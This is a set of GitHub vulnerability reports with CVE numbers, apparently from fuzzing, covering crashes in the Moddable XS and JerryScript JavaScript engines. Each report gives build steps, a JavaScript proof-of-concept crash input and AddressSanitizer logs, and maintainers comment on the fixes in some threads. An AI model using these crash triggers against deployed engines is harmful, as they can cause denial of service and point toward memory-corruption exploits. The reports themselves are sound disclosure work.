Moddable SDK v11.5.0 was discovered to contain an invalid memory access vulnerability via the component __asan_memmove.

**Moddable-XS revision**

Commit: 2f93df29

Version: 11.5.0 32 4

**Build environment**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

cd  ~/moddable/xs/makefiles/lin
make -f xst.mk

**Test case**poc.js

    
    var arr = [];
    for (var i = 0; i < 28000; i++) {
        arr.push(new RegExp("ACAAAAATTAGCCGGGCGTGGTGGCGCGCGCCTGTAATCCCA" + i.toString(3)));
    }
**Execution & Output**

$ ./moddable/build/bin/lin/debug/xst poc.js
=================================================================
==106165==ERROR: AddressSanitizer: negative-size-param: (size=-2147483584)
    #0 0x4ed5ec in \_\_asan\_memmove (/usr/local/bin/xst+0x4ed5ec)
    #1 0x762e01 in fxSweep /root/moddable/xs/sources/xsMemory.c:1629:6
    #2 0x75a711 in fxCollect /root/moddable/xs/sources/xsMemory.c:278:3
    #3 0x767e87 in fxFindChunk /root/moddable/xs/sources/xsMemory.c:407:3
    #4 0x7678dd in fxNewChunk /root/moddable/xs/sources/xsMemory.c:1256:10
    #5 0x9a70e4 in fxCompileRegExp /root/moddable/xs/sources/xsre.c:1697:13
    #6 0x8469f7 in fxInitializeRegExp /root/moddable/xs/sources/xsRegExp.c:138:7
    #7 0x84f3ca in fxRunID /root/moddable/xs/sources/xsRun.c:842:7
    #8 0x845fb6 in fx\_RegExp /root/moddable/xs/sources/xsRegExp.c:235:2
    #9 0x84f3ca in fxRunID /root/moddable/xs/sources/xsRun.c:842:7
    #10 0x8ceaac in fxRunScript /root/moddable/xs/sources/xsRun.c:4766:4
    #11 0xad3231 in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387:2
    #12 0xacfa83 in main /root/moddable/xs/tools/xst.c:281:8
    #13 0x7f80e3cdfbf6 in \_\_libc\_start\_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    #14 0x42ddc9 in \_start (/usr/local/bin/xst+0x42ddc9)

0x7f80e004d7f0 is located 331760 bytes inside of 16777248-byte region \[0x7f80dfffc800,0x7f80e0ffc820)
allocated by thread T0 here:
    #0 0x4edc80 in malloc (/usr/local/bin/xst+0x4edc80)
    #1 0x7dba63 in fxAllocateChunks /root/moddable/xs/sources/xsPlatforms.c:123:9
    #2 0x759641 in fxGrowChunks /root/moddable/xs/sources/xsMemory.c:506:11
    #3 0x75876a in fxAllocate /root/moddable/xs/sources/xsMemory.c:170:2
    #4 0x53d89c in fxCreateMachine /root/moddable/xs/sources/xsAPI.c:1382:4
    #5 0xace769 in main /root/moddable/xs/tools/xst.c:259:19
    #6 0x7f80e3cdfbf6 in \_\_libc\_start\_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310

SUMMARY: AddressSanitizer: negative-size-param (/usr/local/bin/xst+0x4ed5ec) in \_\_asan\_memmove
\==106165\==ABORTING

**No-ASAN Output**

\[1\]    131060 segmentation fault  xst poc.js

Credits: Found by OWL337 team.

CVE-2021-46333: Negative-size-param (/usr/local/bin/xst+0x4ed5ec) in __asan_memmove · Issue #769 · Moddable-OpenSource/moddable

Moddable SDK v11.5.0 was discovered to contain a SEGV vulnerability via xs/sources/xsDataView.c in fx_ArrayBuffer_prototype_concat.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**SEGV xs/sources/xsDataView.c:559:24 in fx\_ArrayBuffer\_prototype\_concat #774**

Closed

hope-fly opened this issue

Jan 10, 2022

· 5 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Moddable-XS revision**

Commit: 2f93df29

Version: 11.5.0 32 4

**Build environment**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

cd  ~/moddable/xs/makefiles/lin
make -f xst.mk

**Test case**poc.js

    
    function JSEtest(f, args) {
        var bound = Function.prototype.bind.apply(f, new ArrayBuffer(64).concat(new Object));
        return new bound();
    }
    var d = JSEtest(Date, [1957, 4, 27]);
**Execution & Output**

$ ./moddable/build/bin/lin/debug/xst poc.js

AddressSanitizer:DEADLYSIGNAL
=================================================================
==62908==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000061df67 bp 0x7fff84c54690 sp 0x7fff84c544f0 T0)
==62908==The signal is caused by a READ memory access.
==62908==Hint: address points to the zero page.
    #0 0x61df66 in fx\_ArrayBuffer\_prototype\_concat /root/moddable/xs/sources/xsDataView.c:559:24
    #1 0x84f3ca in fxRunID /root/moddable/xs/sources/xsRun.c:842:7
    #2 0x8ceaac in fxRunScript /root/moddable/xs/sources/xsRun.c:4766:4
    #3 0xad3231 in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387:2
    #4 0xacfa83 in main /root/moddable/xs/tools/xst.c:281:8
    #5 0x7f1a84524bf6 in \_\_libc\_start\_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    #6 0x42ddc9 in \_start (/usr/local/bin/xst+0x42ddc9)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/moddable/xs/sources/xsDataView.c:559:24 in fx\_ArrayBuffer\_prototype\_concat
==62908==ABORTING

Credits: Found by OWL337 team.

![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=88&u=215e33360b9ddfee4db978bab8a275a39972aa9f&v=4)

Copy link

Collaborator

**![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=60&u=215e33360b9ddfee4db978bab8a275a39972aa9f&v=4) **phoddie** commented Jan 10, 2022**

Thank you for the report.

This PoC can be simplified:

new ArrayBuffer(64).concat({})

FWIW – `Array.prototype.concat` is an extension to JavaScript by XS, not part of EcmaScript standard.

![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=88&u=215e33360b9ddfee4db978bab8a275a39972aa9f&v=4)

Copy link

Collaborator

**![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=60&u=215e33360b9ddfee4db978bab8a275a39972aa9f&v=4) **phoddie** commented Jan 10, 2022**

It looks like the problem is missing braces. 🤦

if (slot && (slot->kind == XS\_ARRAY\_BUFFER\_KIND))

arrayBuffer = slot;

bufferInfo = slot->next;

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

that's interesting, I'll note it 😉

![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=88&u=215e33360b9ddfee4db978bab8a275a39972aa9f&v=4)

Copy link

Collaborator

**![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=60&u=215e33360b9ddfee4db978bab8a275a39972aa9f&v=4) **phoddie** commented Jan 10, 2022**

It looks like that problem snuck in with recent changes to the internal XS buffer representation. I imagine some linter would pick that mistake up.

mkellner pushed a commit that referenced this issue

Jan 10, 2022

![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=60&u=215e33360b9ddfee4db978bab8a275a39972aa9f&v=4)

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

2 participants

 ![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=52&v=4)![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46330: SEGV xs/sources/xsDataView.c:559:24 in fx_ArrayBuffer_prototype_concat · Issue #774 · Moddable-OpenSource/moddable

Moddable SDK v11.5.0 was discovered to contain a SEGV vulnerability via xs/sources/xsProxy.c in fxProxyGetPrototype.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**SEGV xs/sources/xsProxy.c:506 in fxProxyGetPrototype #750**

Closed

hope-fly opened this issue

Dec 14, 2021

· 1 comment

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Moddable-XS revision**

Commit: db8f973

Version: 11.5.0 32 4

**Build environment**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

cd  ~/moddable/xs/makefiles/lin
#(debug)
make -f xst.mk 

**Test case**

function JSEtest(proxyTarget) {
  var {
    proxy,
    revoke
  } \= Proxy.revocable(proxyTarget, new Proxy({}, {
    get(target, propertyKey, receiver) {
      revoke();
    }
  }));
  return proxy;
}

Object.getPrototypeOf(JSEtest({}));

**Execution & Output**

$ ./moddable/build/bin/lin/debug/xst poc.js

ASAN:DEADLYSIGNAL
=================================================================
==68595==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000009 (pc 0x55aceefcfbc1 bp 0x7ffebf0ad710 sp 0x7ffebf0ad6c0 T0)
==68595==The signal is caused by a READ memory access.
==68595==Hint: address points to the zero page.
    #0 0x55aceefcfbc0 in fxProxyGetPrototype /root/moddable/xs/sources/xsProxy.c:506
    #1 0x55acef001f0f in fxRunID /root/moddable/xs/sources/xsRun.c:842
    #2 0x55acef06cc27 in fxRunScript /root/moddable/xs/sources/xsRun.c:4766
    #3 0x55acef27e90a in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387
    #4 0x55aceeba54c7 in main /root/moddable/xs/tools/xst.c:281
    #5 0x7f00319aabf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #6 0x55aceeba70c9 in \_start (/root/moddable/build/bin/lin/debug/xst+0x950c9)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/moddable/xs/sources/xsProxy.c:506 in fxProxyGetPrototype
==68595==ABORTING

Credits: Found by OWL337 team.

mkellner pushed a commit that referenced this issue

Dec 21, 2021

![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=88&u=215e33360b9ddfee4db978bab8a275a39972aa9f&v=4)

Copy link

Collaborator

**![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=60&u=215e33360b9ddfee4db978bab8a275a39972aa9f&v=4) **phoddie** commented Dec 21, 2021**

This is a far reaching bug: the `Proxy` implementation was not defending against `NULL` target (e.g. a revoked proxy) in many paths. We have reviewed the implementation to try to resolve all of those.

2 participants

 ![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=52&v=4)![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46331: SEGV xs/sources/xsProxy.c:506 in fxProxyGetPrototype · Issue #750 · Moddable-OpenSource/moddable

There is an Assertion 'ecma_is_lexical_environment (object_p)' failed at /base/ecma-helpers.c(ecma_get_lex_env_type) in JerryScript 3.0.0.

**JerryScript revision**

Commit: 42523bd6

Version: v3.0.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --linker-flag=-fuse-ld=gold --profile=es2015-subset --stack-limit=20

ASAN closed

**Test case**

var i \= 0;
var a \= \[\];
var JSEtest \= \[\];

JSEtest.\_\_defineGetter\_\_(0, function NaN() {
  if (i++ \> 2) {
    return;
  }

  JSEtest.shift();
  gc();
  a.push(0);
  a.concat(JSEtest);
});

JSEtest\[0\];

​

**Execution steps & Output**

$ ./jerryscript/build/bin/jerry poc.js

ICE: Assertion 'ecma\_is\_lexical\_environment (object\_p)' failed at /home/f1yh0p/jerryscript/jerry-core/ecma/base/ecma-helpers.c(ecma\_get\_lex\_env\_type):291.
Error: ERR\_FAILED\_INTERNAL\_ASSERTION

Credits: Found by OWL337 team.

CVE-2021-46338: Assertion 'ecma_is_lexical_environment (object_p)' failed at ecma-helpers.c (ecma_get_lex_env_type). · Issue #4900 · jerryscript-project/jerryscript

Moddable SDK v11.5.0 was discovered to contain a NULL pointer dereference in the component fx_Function_prototype_hasInstance.

**Build environment**

*   operating system: ubuntu20.04
*   cimmit hash: db8f973
*   compile command:

    cd /pathto/moddable/xs/makefiles/lin
    make debug or make release
    

*   test command:

**poc**

    function assertThrows(code, type_opt, cause_opt) {
        if (typeof code === 'function')
            return code();
        if (typeof code === 'string')
            return eval(code);
    }
    (function () {
        var F = {};
        F[Symbol.hasInstance] = null;
        assertThrows || F ? 7160833982606838.000000: assertThrows(assertThrows, /[\WD]/i, /T61/);
    }());
    (function () {
        var F = {};
        F[Symbol.hasInstance] = function () {
            return undefined;
        };
        print(0 instanceof F, false);
        F[Symbol.hasInstance] = function () {
            return null;
        };
        print(0 instanceof F, false);
        F[Symbol.hasInstance] = function () {
            return true;
        };
        print(0 instanceof F, true);
    }());
    (function () {
        var F = {};
        F[Symbol.hasInstance] = function () {
            throw new Error('always throws');
        };
        try {
            0 instanceof F;
        } catch (e) {
            print(e.message, 'always throws');
        }
    }());
    (function () {
        var BC = function () {
        };
        var bc = new BC();
        var bound = BC.bind();
        print(bound[Symbol.hasInstance](bc), true);
        print(bound[Symbol.hasInstance]([]), false);
    }());
    print(Function.prototype[Symbol.hasInstance].call(Array, []), true);
    print(Function.prototype[Symbol.hasInstance].call({
        "L0VB0": assertThrows
    }, {
        "getPrototypeOf": assertThrows
    }), false);
    print(Function.prototype[Symbol.hasInstance].call(Array, 0), false);
    (function () {
        'use strict';
        function F() {
        }
        assertThrows(function () {
            F[Symbol.hasInstance] = v => v;
        }, TypeError);
    }());
    (function () {
        function F() {
        }
        var counter = 0;
        var proto = Object.getPrototypeOf(F);
        Object.setPrototypeOf(F, null);
        F[Symbol.hasInstance] = function (v) {
            ++counter;
            return true;
        };
        Object.setPrototypeOf(F, proto);
        print(1 instanceof F);
        print(1, counter);
    }());
    

*   asan log

    =================================================================
    ==2131098==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000542885 bp 0x7ffc6530e8d0 sp 0x7ffc6530e8a0 T0)
    ==2131098==The signal is caused by a READ memory access.
    ==2131098==Hint: address points to the zero page.
        #0 0x542885 in fx_Function_prototype_hasInstance /home/sakura/moddable/xs/sources/xsFunction.c:546:11
        #1 0x59b4b7 in fxRunID /home/sakura/moddable/xs/sources/xsRun.c:842:8
        #2 0x5426e1 in fx_Function_prototype_call /home/sakura/moddable/xs/sources/xsFunction.c:526:2
        #3 0x59b4b7 in fxRunID /home/sakura/moddable/xs/sources/xsRun.c:842:8
        #4 0x5b50e2 in fxRunScript /home/sakura/moddable/xs/sources/xsRun.c:4766:4
        #5 0x61567c in fxRunProgramFile /home/sakura/moddable/xs/tools/xst.c:1387:2
        #6 0x60fbef in main /home/sakura/moddable/xs/tools/xst.c:281:8
        #7 0x7f08b5c6e0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
        #8 0x42e6bd in _start (/home/sakura/moddable/build/bin/lin/debug/xst+0x42e6bd)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/sakura/moddable/xs/sources/xsFunction.c:546:11 in fx_Function_prototype_hasInstance
    ==2131098==ABORTING
    

*   release log

    [] ~/sk-afl-js/moddable_workdir <main> ~/moddable/build/bin/lin/release/xst fuzz_output/fuzzer1/crashes/id:000021,sig:06,src:002188,op:$null$,pos:0.js 
    false false
    false false
    true true
    always throws always throws
    true true
    false false
    true true
    [2]    2105934 segmentation fault  ~/moddable/build/bin/lin/release/xst

CVE-2021-46335: AddressSanitizer: Null pointer dereference in fx_Function_prototype_hasInstance · Issue #748 · Moddable-OpenSource/moddable

There is an Assertion 'lit_is_valid_cesu8_string (string_p, string_size)' failed at /base/ecma-helpers-string.c(ecma_new_ecma_string_from_utf8) in JerryScript 3.0.0.

![@FlydragonTy](https://avatars.githubusercontent.com/u/26462149?s=88&v=4)

**JerryScript revision**

Commit: a6ab5e9

Version: v3.0.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86\_64)

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20

**Test case**

poc-as.txt

**Execution steps & Output**

$ ./jerryscript/build/bin/jerry poc.js

ICE: Assertion 'lit\_is\_valid\_cesu8\_string (string\_p, string\_size)' failed at jerryscript/jerry-core/ecma/base/ecma-helpers-string.c(ecma\_new\_ecma\_string\_from\_utf8):371.
Error: ERR\_FAILED\_INTERNAL\_ASSERTION
\[1\]    abort      jerry poc.js

Credits: Found by OWL337 team.

![@ossy-szeged](https://avatars.githubusercontent.com/u/1391143?s=88&u=cc8d6569e0d32025518373cbc3f225bb7eb2092c&v=4)

@rerobika I think it is not a bug, but a feature. "𞸋" is encoded in UTF-8 as 0xF09EB88B which is invaliid in CESU8. But of course we could raise a user friendly error message instead of assertion.

![@dbatyai](https://avatars.githubusercontent.com/u/12066566?s=88&v=4)

The issue is not with the "𞸋" character, all non-BMP characters are converted to cesu8 encoding during parsing.  
The problem is that the first character is in the basic multilingual plane and should be encoded using 3 bytes, however it is encoded using 4 bytes in the input. This messes up the conversion logic, which always expects the cesu8 equivalent to be 6 bytes long.

![@ossy-szeged](https://avatars.githubusercontent.com/u/1391143?s=88&u=cc8d6569e0d32025518373cbc3f225bb7eb2092c&v=4)

+info, a simple `/*𝔽*/` string fails with the same error if we build with tools/build.py --debug --function-to-string=on

CVE-2021-46339: Assertion 'lit_is_valid_cesu8_string (string_p, string_size)' failed at jerryscript/jerry-core/ecma/base/ecma-helpers-string.c(ecma_new_ecma_string_from_utf8):371.  · Issue #4935 · jerryscript-project

Moddable SDK v11.5.0 was discovered to contain a stack buffer overflow via the component __interceptor_strcat.

**Moddable-XS revision**

Commit: 2f93df29

Version: 11.5.0 32 4

**Build environment**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

cd  ~/moddable/xs/makefiles/lin
#debug
make -f xst.mk

**Test case**

//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjozLCJzb3VyY2VzIjpbIndlYnBhY2s6Ly8vd2VicGFjay9ib290c3RyYXAgNDJlMDQyN2ExYTZlMzk3NTdjOGMiLCJ3ZWJwYWNrOi8vLy4vY29kZV9pbmxpbmVfb3JpZ2luYWwuanMiXSwibmFtZXMiOltdLCJtYXBwaW5ncyI6IjtBQUFBO0FBQ0E7O0FBRUE7QUFDQTs7QUFFQTtBQUNBO0FBQ0E7QUFDQTtBQUNBO0FBQ0E7QUFDQTtBQUNBO0FBQ0E7QUFDQTs7QUFFQTtBQUNBOztBQUVBO0FBQ0E7O0FBRUE7QUFDQTtBQUNBOzs7QUFHQTtBQUNBOztBQUVBO0FBQ0E7O0FBRUE7QUFDQSxtREFBMkMsY0FBYzs7QUFFekQ7QUFDQTtBQUNBO0FBQ0E7QUFDQTtBQUNBO0FBQ0E7QUFDQSxhQUFLO0FBQ0w7QUFDQTs7QUFFQTtBQUNBO0FBQ0E7QUFDQSxtQ0FBMkIsMEJBQTBCLEVBQUU7QUFDdkQseUNBQWlDLGVBQWU7QUFDaEQ7QUFDQTtBQUNBOztBQUVBO0FBQ0EsOERBQXNELCtEQUErRDs7QUFFckg7QUFDQTs7QUFFQTtBQUNBOzs7Ozs7OztBQ2hFQTtBQUNBOztBQUVBO0FBQ0E7QUFDQTs7QUFFQTs7QUFFQTtBQUNBO0FBQ0E7O0FBRUEiLCJmaWxlIjoiY29kZV9pbmxpbmVfYnVuZGxlLmpzIiwic291cmNlc0NvbnRlbnQiOlsiIFx0Ly8gVGhlIG1vZHVsZSBjYWNoZVxuIFx0dmFyIGluc3RhbGxlZE1vZHVsZXMgPSB7fTtcblxuIFx0Ly8gVGhlIHJlcXVpcmUgZnVuY3Rpb25cbiBcdGZ1bmN0aW9uIF9fd2VicGFja19yZXF1aXJlX18obW9kdWxlSWQpIHtcblxuIFx0XHQvLyBDaGVjayBpZiBtb2R1bGUgaXMgaW4gY2FjaGVcbiBcdFx0aWYoaW5zdGFsbGVkTW9kdWxlc1ttb2R1bGVJZF0pIHtcbiBcdFx0XHRyZXR1cm4gaW5zdGFsbGVkTW9kdWxlc1ttb2R1bGVJZF0uZXhwb3J0cztcbiBcdFx0fVxuIFx0XHQvLyBDcmVhdGUgYSBuZXcgbW9kdWxlIChhbmQgcHV0IGl0IGludG8gdGhlIGNhY2hlKVxuIFx0XHR2YXIgbW9kdWxlID0gaW5zdGFsbGVkTW9kdWxlc1ttb2R1bGVJZF0gPSB7XG4gXHRcdFx0aTogbW9kdWxlSWQsXG4gXHRcdFx0bDogZmFsc2UsXG4gXHRcdFx0ZXhwb3J0czoge31cbiBcdFx0fTtcblxuIFx0XHQvLyBFeGVjdXRlIHRoZSBtb2R1bGUgZnVuY3Rpb25cbiBcdFx0bW9kdWxlc1ttb2R1bGVJZF0uY2FsbChtb2R1bGUuZXhwb3J0cywgbW9kdWxlLCBtb2R1bGUuZXhwb3J0cywgX193ZWJwYWNrX3JlcXVpcmVfXyk7XG5cbiBcdFx0Ly8gRmxhZyB0aGUgbW9kdWxlIGFzIGxvYWRlZFxuIFx0XHRtb2R1bGUubCA9IHRydWU7XG5cbiBcdFx0Ly8gUmV0dXJuIHRoZSBleHBvcnRzIG9mIHRoZSBtb2R1bGVcbiBcdFx0cmV0dXJuIG1vZHVsZS5leHBvcnRzO1xuIFx0fVxuXG5cbiBcdC8vIGV4cG9zZSB0aGUgbW9kdWxlcyBvYmplY3QgKF9fd2VicGFja19tb2R1bGVzX18pXG4gXHRfX3dlYnBhY2tfcmVxdWlyZV9fLm0gPSBtb2R1bGVzO1xuXG4gXHQvLyBleHBvc2UgdGhlIG1vZHVsZSBjYWNoZVxuIFx0X193ZWJwYWNrX3JlcXVpcmVfXy5jID0gaW5zdGFsbGVkTW9kdWxlcztcblxuIFx0Ly8gaWRlbnRpdHkgZnVuY3Rpb24gZm9yIGNhbGxpbmcgaGFybW9ueSBpbXBvcnRzIHdpdGggdGhlIGNvcnJlY3QgY29udGV4dFxuIFx0X193ZWJwYWNrX3JlcXVpcmVfXy5pID0gZnVuY3Rpb24odmFsdWUpIHsgcmV0dXJuIHZhbHVlOyB9O1xuXG4gXHQvLyBkZWZpbmUgZ2V0dGVyIGZ1bmN0aW9uIGZvciBoYXJtb255IGV4cG9ydHNcbiBcdF9fd2VicGFja19yZXF1aXJlX18uZCA9IGZ1bmN0aW9uKGV4cG9ydHMsIG5hbWUsIGdldHRlcikge1xuIFx0XHRpZighX193ZWJwYWNrX3JlcXVpcmVfXy5vKGV4cG9ydHMsIG5hbWUpKSB7XG4gXHRcdFx0T2JqZWN0LmRlZmluZVByb3BlcnR5KGV4cG9ydHMsIG5hbWUsIHtcbiBcdFx0XHRcdGNvbmZpZ3VyYWJsZTogZmFsc2UsXG4gXHRcdFx0XHRlbnVtZXJhYmxlOiB0cnVlLFxuIFx0XHRcdFx0Z2V0OiBnZXR0ZXJcbiBcdFx0XHR9KTtcbiBcdFx0fVxuIFx0fTtcblxuIFx0Ly8gZ2V0RGVmYXVsdEV4cG9ydCBmdW5jdGlvbiBmb3IgY29tcGF0aWJpbGl0eSB3aXRoIG5vbi1oYXJtb255IG1vZHVsZXNcbiBcdF9fd2VicGFja19yZXF1aXJlX18ubiA9IGZ1bmN0aW9uKG1vZHVsZSkge1xuIFx0XHR2YXIgZ2V0dGVyID0gbW9kdWxlICYmIG1vZHVsZS5fX2VzTW9kdWxlID9cbiBcdFx0XHRmdW5jdGlvbiBnZXREZWZhdWx0KCkgeyByZXR1cm4gbW9kdWxlWydkZWZhdWx0J107IH0gOlxuIFx0XHRcdGZ1bmN0aW9uIGdldE1vZHVsZUV4cG9ydHMoKSB7IHJldHVybiBtb2R1bGU7IH07XG4gXHRcdF9fd2VicGFja19yZXF1aXJlX18uZChnZXR0ZXIsICdhJywgZ2V0dGVyKTtcbiBcdFx0cmV0dXJuIGdldHRlcjtcbiBcdH07XG5cbiBcdC8vIE9iamVjdC5wcm90b3R5cGUuaGFzT3duUHJvcGVydHkuY2FsbFxuIFx0X193ZWJwYWNrX3JlcXVpcmVfXy5vID0gZnVuY3Rpb24ob2JqZWN0LCBwcm9wZXJ0eSkgeyByZXR1cm4gT2JqZWN0LnByb3RvdHlwZS5oYXNPd25Qcm9wZXJ0eS5jYWxsKG9iamVjdCwgcHJvcGVydHkpOyB9O1xuXG4gXHQvLyBfX3dlYnBhY2tfcHVibGljX3BhdGhfX1xuIFx0X193ZWJwYWNrX3JlcXVpcmVfXy5wID0gXCJcIjtcblxuIFx0Ly8gTG9hZCBlbnRyeSBtb2R1bGUgYW5kIHJldHVybiBleHBvcnRzXG4gXHRyZXR1cm4gX193ZWJwYWNrX3JlcXVpcmVfXyhfX3dlYnBhY2tfcmVxdWlyZV9fLnMgPSAwKTtcblxuXG5cbi8vIFdFQlBBQ0sgRk9PVEVSIC8vXG4vLyB3ZWJwYWNrL2Jvb3RzdHJhcCA0MmUwNDI3YTFhNmUzOTc1N2M4YyIsIi8qIEFueSBjb3B5cmlnaHQgaXMgZGVkaWNhdGVkIHRvIHRoZSBQdWJsaWMgRG9tYWluLlxuIGh0dHA6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL3B1YmxpY2RvbWFpbi96ZXJvLzEuMC8gKi9cblxuLy8gT3JpZ2luYWwgc291cmNlIGNvZGUgZm9yIHRoZSBpbmxpbmUgc291cmNlIG1hcCB0ZXN0LlxuLy8gVGhlIGdlbmVyYXRlZCBmaWxlIHdhcyBtYWRlIHdpdGhcbi8vICAgIHdlYnBhY2sgLS1kZXZ0b29sIGlubGluZS1zb3VyY2UtbWFwIGNvZGVfaW5saW5lX29yaWdpbmFsLmpzIGNvZGVfaW5saW5lX2J1bmRsZS5qc1xuXG5cInVzZSBzdHJpY3RcIjtcblxuZnVuY3Rpb24gZigpIHtcbiAgY29uc29sZS5sb2coXCJJJ20gYSBnb2xkZmlzaCB3aXRoIGEgbWVycnkgZmFjZVwiKTtcbn1cblxuZigpO1xuXG5cblxuLy8vLy8vLy8vLy8vLy8vLy8vXG4vLyBXRUJQQUNLIEZPT1RFUlxuLy8gLi9jb2RlX2lubGluZV9vcmlnaW5hbC5qc1xuLy8gbW9kdWxlIGlkID0gMFxuLy8gbW9kdWxlIGNodW5rcyA9IDAiXSwic291cmNlUm9vdCI6IiJ9

**Execution & Output with ASAN**

$ xst poc.js
=================================================================
====ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe2b073ce0 at pc 0x000000449adb bp 0x7ffe2b070e30 sp 0x7ffe2b0705e0
WRITE of size 4372 at 0x7ffe2b073ce0 thread T0
    #0 0x449ada in \_\_interceptor\_strcat (/usr/local/bin/xst+0x449ada)
    #1 0x7df692 in fxLoadScript /root/moddable/xs/sources/xsPlatforms.c:403:4
    #2 0xad2f99 in fxRunProgramFile /root/moddable/xs/tools/xst.c:1385:21
    #3 0xacfa83 in main /root/moddable/xs/tools/xst.c:281:8
    #4 0x7fea1d53cbf6 in \_\_libc\_start\_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    #5 0x42ddc9 in \_start (/usr/local/bin/xst+0x42ddc9)

Address 0x7ffe2b073ce0 is located in stack of thread T0 at offset 4128 in frame
    #0 0xacdaef in main /root/moddable/xs/tools/xst.c:201

  This frame has 4 object(s):
    \[32, 4128) 'path' (line 204)
    \[4256, 4300) '\_creation' (line 244) <== Memory access at offset 4128 partially underflows this variable
    \[4336, 4592) '\_\_HOST\_JUMP\_\_' (line 261) <== Memory access at offset 4128 partially underflows this variable
    \[4656, 4912) '\_\_JUMP\_\_' (line 264) <== Memory access at offset 4128 partially underflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions \*are\* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow (/usr/local/bin/xst+0x449ada) in \_\_interceptor\_strcat
Shadow bytes around the buggy address:
  0x100045606740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100045606750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100045606760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100045606770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100045606780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=\>0x100045606790: 00 00 00 00 00 00 00 00 00 00 00 00\[f2\]f2 f2 f2
  0x1000456067a0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 00 00 00 00
  0x1000456067b0: 00 04 f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00
  0x1000456067c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000456067d0: 00 00 00 00 00 00 f2 f2 f2 f2 f2 f2 f2 f2 00 00
  0x1000456067e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==77303==ABORTING

**No-ASAN Output**

SyntaxError: (host): invalid script
\*\*\* stack smashing detected \*\*\*: <unknown\> terminated
\[1\]   abort      xst poc.js

Credits: Found by OWL337 team.

